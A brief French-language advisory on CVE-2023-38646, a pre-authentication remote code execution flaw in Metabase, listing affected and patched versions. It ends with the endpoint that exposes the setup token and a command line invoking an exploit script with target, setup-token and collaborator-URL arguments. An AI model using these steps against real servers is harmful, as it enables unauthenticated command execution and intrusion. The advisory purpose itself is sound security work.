
Exécution de code à distance avant authentification Metabase

Metabase open source avant 0.46.6.1 et Metabase Enterprise avant 1.46.6.1 permettent aux attaquants d'exécuter des commandes arbitraires sur le serveur, au niveau de privilège du serveur. L'authentification n'est pas requise pour l'exploitation. Les autres versions corrigées sont 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, et 1.43.7.2.
http://vulnerablehost.com/api/session/properties
python3 CVE-2023-38646.py -u <target> -t <setup-token> -c <collaborator-url>